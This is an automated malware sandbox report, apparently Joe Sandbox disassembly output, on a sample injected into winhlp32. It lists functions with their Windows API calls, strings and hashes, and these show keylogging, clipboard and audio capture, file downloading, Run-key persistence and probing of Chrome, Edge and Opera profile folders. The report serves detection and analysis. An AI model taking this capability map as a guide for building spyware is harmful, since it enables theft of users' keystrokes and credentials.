                                    • ___BuildCatchObject.LIBVCRUNTIME ref: 0043987A
                                      • Part of subcall function 00439EB2: ___AdjustPointer.LIBCMT ref: 00439EFC
                                    • _UnwindNestedFrames.LIBCMT ref: 00439891
                                    • ___FrameUnwindToState.LIBVCRUNTIME ref: 004398A3
                                    • CallCatchBlock.LIBVCRUNTIME ref: 004398C7
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                    • String ID:
                                    • API String ID: 2633735394-0
                                    • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                    • Instruction ID: dcee73c62e3621a690853eebe59cad03ae51e1002f288686f44977c5109bb855
                                    • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                    • Instruction Fuzzy Hash: 18011732000109BBCF12AF55CC01EDA3BBAEF9D754F04511AFD5861221C3BAE861DBA5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004193E3 Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetSystemMetrics.USER32(0000004C), ref: 004193F0
                                    • GetSystemMetrics.USER32(0000004D), ref: 004193F6
                                    • GetSystemMetrics.USER32(0000004E), ref: 004193FC
                                    • GetSystemMetrics.USER32(0000004F), ref: 00419402
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: MetricsSystem
                                    • String ID:
                                    • API String ID: 4116985748-0
                                    • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                    • Instruction ID: 9a44d86f369c7068fc2c949f9b02ed5542bf43da40f6b7222f807aea32733f55
                                    • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                    • Instruction Fuzzy Hash: DFF0A471B043155BD744EA759C51A6F6BD5EBD4264F10043FF20887281EE78DC468785
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00442C5D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                    Download Yara Rule
                                    APIs
                                    • __startOneArgErrorHandling.LIBCMT ref: 00442CED
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorHandling__start
                                    • String ID: pow
                                    • API String ID: 3213639722-2276729525
                                    • Opcode ID: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
                                    • Instruction ID: c2a334fe3ab53b67a82bc2a1da04863f7f1ed5e2a579c87dfbcc8ae8a095d349
                                    • Opcode Fuzzy Hash: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
                                    • Instruction Fuzzy Hash: C6516DA1E0420296FB167B14CE4137B2BA4DB40751F704D7FF096823AAEB7D8C859A4F
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040B748 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                    • __Init_thread_footer.LIBCMT ref: 0040B797
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Init_thread_footer__onexit
                                    • String ID: [End of clipboard]$[Text copied to clipboard]
                                    • API String ID: 1881088180-3686566968
                                    • Opcode ID: 60402113f4b18a007ad5d9fa0adee8409e9b11ca3b01e04d5642538178529adf
                                    • Instruction ID: c7bebb0a0a15900a9cc4ffb6e17528162536323bfdf0e6139bd55c50ddf57f74
                                    • Opcode Fuzzy Hash: 60402113f4b18a007ad5d9fa0adee8409e9b11ca3b01e04d5642538178529adf
                                    • Instruction Fuzzy Hash: C0219F32A101054ACB14FB66D8829EDB379AF90318F10453FE505731E2EF386D4A8A9C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00451B37 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451D92,?,00000050,?,?,?,?,?), ref: 00451C12
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: ACP$OCP
                                    • API String ID: 0-711371036
                                    • Opcode ID: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                                    • Instruction ID: fc24b39bc158c677debbea649066bee6e1bba6d32f28379ebc1c8ba741b2d3ba
                                    • Opcode Fuzzy Hash: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                                    • Instruction Fuzzy Hash: BA217D22A4010063DB34CF54C940B9B326ADF50B27F568166ED09C7322F73AED44C39C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0044B731 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81fileCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,PkGNG,0044BB6E,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B7DB
                                    • GetLastError.KERNEL32 ref: 0044B804
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorFileLastWrite
                                    • String ID: PkGNG
                                    • API String ID: 442123175-263838557
                                    • Opcode ID: e2af8d231f6539d56f2593d6ace3ed0d4bab48f660b2d85d051dab4aa689f9d2
                                    • Instruction ID: 56933c973e2243a1a9a6e47b5ff38ff3048756f5123006952a384074424e161b
                                    • Opcode Fuzzy Hash: e2af8d231f6539d56f2593d6ace3ed0d4bab48f660b2d85d051dab4aa689f9d2
                                    • Instruction Fuzzy Hash: 12319331A00619DBCB24CF59CD809DAB3F9EF88311F1445AAE509D7361D734ED81CB68
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0044B652 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77fileCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,PkGNG,0044BB8E,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B6ED
                                    • GetLastError.KERNEL32 ref: 0044B716
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorFileLastWrite
                                    • String ID: PkGNG
                                    • API String ID: 442123175-263838557
                                    • Opcode ID: 51546446b41bf805027a94335c0e64e4fe702750584376849c5da3291fd64da6
                                    • Instruction ID: 12ef57d8ab414bd2a6c5914f5c8b73f84ca543b1ee1fc2f1adbb6bb6aefc8993
                                    • Opcode Fuzzy Hash: 51546446b41bf805027a94335c0e64e4fe702750584376849c5da3291fd64da6
                                    • Instruction Fuzzy Hash: 6C21B435600219DFCB14CF69C980BE9B3F8EB48302F1044AAE94AD7351D734ED81CB64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041663B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62sleepfilenetworkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • Sleep.KERNEL32 ref: 00416640
                                    • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166A2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: DownloadFileSleep
                                    • String ID: !D@
                                    • API String ID: 1931167962-604454484
                                    • Opcode ID: 1ee2299181c43429df041adb64fff50d3160e985c7a9a19c3789c6205816a6ff
                                    • Instruction ID: f21b004d79e7af0ef9ad63e4b6518ad07bb10e0138b316cec4f8e9f86784bb19
                                    • Opcode Fuzzy Hash: 1ee2299181c43429df041adb64fff50d3160e985c7a9a19c3789c6205816a6ff
                                    • Instruction Fuzzy Hash: C6115171A083029AC714FF72D8969BE77A8AF54348F400C3FF546621E2EE3C9949C65A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040B051 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                                      • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                    • CloseHandle.KERNEL32(?), ref: 0040B0B4
                                    • UnhookWindowsHookEx.USER32 ref: 0040B0C7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                    • String ID: Online Keylogger Stopped
                                    • API String ID: 1623830855-1496645233
                                    • Opcode ID: bcbfeeedac202dcce5c27b8ae7271b8f67804fce0d04219dcea429481c7fcc84
                                    • Instruction ID: 2e372e3e3892c4e8816e9c8053feed756abc81e7e35a03d4dadb391bbfa0e77d
                                    • Opcode Fuzzy Hash: bcbfeeedac202dcce5c27b8ae7271b8f67804fce0d04219dcea429481c7fcc84
                                    • Instruction Fuzzy Hash: 0101F5306002049BD7217B35C80B3BF7BA59B41305F40007FE642226D2EBB91845D7DE
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00448BB3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,73E85006,00000001,?,0043CE55), ref: 00448C24
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: String
                                    • String ID: LCMapStringEx$PkGNG
                                    • API String ID: 2568140703-1065776982
                                    • Opcode ID: 20edb6311ff80fd52f273064eb78c9c2f4c40470f2fa2ad589d6478c135721a4
                                    • Instruction ID: 91dcaeff4e4508283399e99d6512adb219adb357de156da575c9a111b1dd59a7
                                    • Opcode Fuzzy Hash: 20edb6311ff80fd52f273064eb78c9c2f4c40470f2fa2ad589d6478c135721a4
                                    • Instruction Fuzzy Hash: 3F016532500209FBCF029F90DC01EEE7F62EF08351F10452AFE0925161CA3A8971AB99
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004017EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                    Download Yara Rule
                                    APIs
                                    • waveInPrepareHeader.WINMM(?,00000020,?,?,00476B50,00474EE0,?,00000000,00401A15), ref: 00401849
                                    • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401A15), ref: 0040185F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: wave$BufferHeaderPrepare
                                    • String ID: XMG
                                    • API String ID: 2315374483-813777761
                                    • Opcode ID: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
                                    • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                                    • Opcode Fuzzy Hash: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
                                    • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00448AE6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • IsValidLocale.KERNEL32(00000000,JD,00000000,00000001,?,?,00444AEA,?,?,004444CA,?,00000004), ref: 00448B32
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: LocaleValid
                                    • String ID: IsValidLocaleName$JD
                                    • API String ID: 1901932003-2234456777
                                    • Opcode ID: 51bc9a782de688291f39784aabc01e809a53b6defb3ea5057969789d83f50679
                                    • Instruction ID: c43517d2c5aad0833927174c53c021eab8a1ac695cd7bc198788f3b2bcf9e263
                                    • Opcode Fuzzy Hash: 51bc9a782de688291f39784aabc01e809a53b6defb3ea5057969789d83f50679
                                    • Instruction Fuzzy Hash: D6F05230A80308F7DB106B60DC06FAEBF58CB04B52F10017EFD046B291CE786E05929E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040C4C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                    Download Yara Rule
                                    APIs
                                    • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExistsFilePath
                                    • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                    • API String ID: 1174141254-4188645398
                                    • Opcode ID: 333e2781ec0ec89fbd88f6f0735ff55aec90b53b609e1a946a8fd7ce7860d637
                                    • Instruction ID: 529cceb54bdbac8586af3e6ebd5273a77adcdcd577382419881006e182ae29c8
                                    • Opcode Fuzzy Hash: 333e2781ec0ec89fbd88f6f0735ff55aec90b53b609e1a946a8fd7ce7860d637
                                    • Instruction Fuzzy Hash: 96F05E31A00219A6C604BBF69C478BF7B3C9D50709B50017FBA01B61D3EE789945C6EE
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040C526 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                    Download Yara Rule
                                    APIs
                                    • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExistsFilePath
                                    • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                    • API String ID: 1174141254-2800177040
                                    • Opcode ID: 46641891947e03d640cd62480cc1169afb97d1bf2d9271bf70253981d5b275da
                                    • Instruction ID: 330371ab8f71d6844e3501a7b0875f3b866c8fe31c1dcac5d822fe972055fe7f
                                    • Opcode Fuzzy Hash: 46641891947e03d640cd62480cc1169afb97d1bf2d9271bf70253981d5b275da
                                    • Instruction Fuzzy Hash: ECF05E31A00219A6CA14B7B69C47CEF7B6C9D50705B10017FB602B61D2EE78994186EE
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040C589 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                    Download Yara Rule
                                    APIs
                                    • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5BC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExistsFilePath
                                    • String ID: AppData$\Opera Software\Opera Stable\
                                    • API String ID: 1174141254-1629609700
                                    • Opcode ID: 776327d6e5661bbd5273f74550199b0ae7763d34e3e9ac4bd8830f7a720e7153
                                    • Instruction ID: 49b076bb86b4c8db4da1bdedad10e463925805c403c57d636a3174f469f12df7
                                    • Opcode Fuzzy Hash: 776327d6e5661bbd5273f74550199b0ae7763d34e3e9ac4bd8830f7a720e7153
                                    • Instruction Fuzzy Hash: 13F05E31A00319A6CA14B7B69C47CEF7B7C9D10709B40017BB601B61D2EE789D4586EA
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040B646 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetKeyState.USER32(00000011), ref: 0040B64B
                                      • Part of subcall function 0040A3E0: GetForegroundWindow.USER32 ref: 0040A416
                                      • Part of subcall function 0040A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                                      • Part of subcall function 0040A3E0: GetKeyboardLayout.USER32(00000000), ref: 0040A429
                                      • Part of subcall function 0040A3E0: GetKeyState.USER32(00000010), ref: 0040A433
                                      • Part of subcall function 0040A3E0: GetKeyboardState.USER32(?), ref: 0040A43E
                                      • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A461
                                      • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
                                      • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                    • String ID: [AltL]$[AltR]
                                    • API String ID: 2738857842-2658077756
                                    • Opcode ID: 7258a7f4b132cbc40b361f8d5efa273a6a49595113cd8e0a5555153196a7725b
                                    • Instruction ID: e48b288e44f9d4c6b211653e2fe3bcc76c2b66b59b43e84e4aaf588e4500f4a3
                                    • Opcode Fuzzy Hash: 7258a7f4b132cbc40b361f8d5efa273a6a49595113cd8e0a5555153196a7725b
                                    • Instruction Fuzzy Hash: 3BE0652134021052C828323E592F6BE2D51C742754B86057FF9826B6C5DABF4D1542CF
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00448957 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetSystemTimeAsFileTime.KERNEL32(00000000,0043AAB7), ref: 00448996
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Time$FileSystem
                                    • String ID: GetSystemTimePreciseAsFileTime$PkGNG
                                    • API String ID: 2086374402-949981407
                                    • Opcode ID: e85234dd122f09b0c94e77719a40fbeea2143a0bc5736c6b14345478c49c6815
                                    • Instruction ID: 0ece642104574987c61f359f6ab52f67772cb5eafdc88f944851b8b866d171c2
                                    • Opcode Fuzzy Hash: e85234dd122f09b0c94e77719a40fbeea2143a0bc5736c6b14345478c49c6815
                                    • Instruction Fuzzy Hash: 55E0E571A41718E7D710AB259C02E7EBB54DB44B02B10027EFC0957382DE285D0496DE
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041618A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                    Download Yara Rule
                                    APIs
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161A8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExecuteShell
                                    • String ID: !D@$open
                                    • API String ID: 587946157-1586967515
                                    • Opcode ID: a3fafa264baa1d62442d83e0179a885528cd25db469b1c0675910708919d2975
                                    • Instruction ID: 73504a7432a82bf20c2cd712858cac99996ed9f8eaf32da6c0f13d1c3fa6c831
                                    • Opcode Fuzzy Hash: a3fafa264baa1d62442d83e0179a885528cd25db469b1c0675910708919d2975
                                    • Instruction Fuzzy Hash: 2FE0ED712483059AD614EA72DC91AFE7358AB54755F40083FF506514E2EE3C5849C65A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0045554B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • ___initconout.LIBCMT ref: 0045555B
                                      • Part of subcall function 00456B1D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00455560,00000000,PkGNG,0044B59D,?,FF8BC35D,00000000,?,00000000), ref: 00456B30
                                    • WriteConsoleW.KERNEL32(FFFFFFFE,FF8BC369,00000001,00000000,00000000,00000000,PkGNG,0044B59D,?,FF8BC35D,00000000,?,00000000,PkGNG,0044BB19,?), ref: 0045557E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ConsoleCreateFileWrite___initconout
                                    • String ID: PkGNG
                                    • API String ID: 3087715906-263838557
                                    • Opcode ID: 4fd586c33a7e536def3848490aff3c82696797501ee569242fdde9145b290049
                                    • Instruction ID: e84ccb038854987deafcb7b601af55b429ad8f27f18c1f17be9b2782bd97289a
                                    • Opcode Fuzzy Hash: 4fd586c33a7e536def3848490aff3c82696797501ee569242fdde9145b290049
                                    • Instruction Fuzzy Hash: 10E02B70500508BBD610CB64DC25EB63319EB003B1F600315FE25C72D1EB34DD44C759
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040B6A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetKeyState.USER32(00000012), ref: 0040B6A5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: State
                                    • String ID: [CtrlL]$[CtrlR]
                                    • API String ID: 1649606143-2446555240
                                    • Opcode ID: 9c7a87a125a36fd6875230b5c06d2f1de547b3d92bb8a42f9d283a23a60e093e
                                    • Instruction ID: bec5627f59812d2efb235ad4bfa8f6d19d2d97b3e0140e65676d9d4505e8418d
                                    • Opcode Fuzzy Hash: 9c7a87a125a36fd6875230b5c06d2f1de547b3d92bb8a42f9d283a23a60e093e
                                    • Instruction Fuzzy Hash: 6FE04F2160021052C524363D5A1E67D2911CB52754B42096FF882A76CADEBF891543CF
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040E79F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                    • __Init_thread_footer.LIBCMT ref: 00410F29
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Init_thread_footer__onexit
                                    • String ID: ,kG$0kG
                                    • API String ID: 1881088180-2015055088
                                    • Opcode ID: b05ab0c9b3baa3f524da702d8fc1cd1898caf97046da089980d037e9e657a158
                                    • Instruction ID: c595ded0a674a2b9ccc74dbc71d20adb946c68f5a758ea4f5ad5526f3cc50642
                                    • Opcode Fuzzy Hash: b05ab0c9b3baa3f524da702d8fc1cd1898caf97046da089980d037e9e657a158
                                    • Instruction Fuzzy Hash: 35E0D8312149208EC214A32995829C93791DB4E335B61412BF414D72D5CBAEB8C1CA1D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00413A23 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D4CE,00000000,?,00000000), ref: 00413A31
                                    • RegDeleteValueW.ADVAPI32(?,?,?,00000000), ref: 00413A45
                                    Strings
                                    • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A2F
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: DeleteOpenValue
                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                    • API String ID: 2654517830-1051519024
                                    • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                    • Instruction ID: 6fb421a43559def270d35797bbb86f7c8bc210cd52a17bc53693ea6618a40a87
                                    • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                    • Instruction Fuzzy Hash: 99E0C23124420CFBDF104F71DD06FFA376CDB01F42F1006A5BA0692091C626DF049668
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00411B5F Relevance: 5.1, APIs: 4, Instructions: 119COMMON
                                    Download Yara Rule
                                    APIs
                                    • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00411EF0), ref: 00411B8C
                                    • IsBadReadPtr.KERNEL32(?,00000014,00411EF0), ref: 00411C58
                                    • SetLastError.KERNEL32(0000007F), ref: 00411C7A
                                    • SetLastError.KERNEL32(0000007E,00411EF0), ref: 00411C91
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLastRead
                                    • String ID:
                                    • API String ID: 4100373531-0
                                    • Opcode ID: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                                    • Instruction ID: 277f4bdee2933866d2d1c697a3b04f0a6a13197b354a533a519a822f1f8833ca
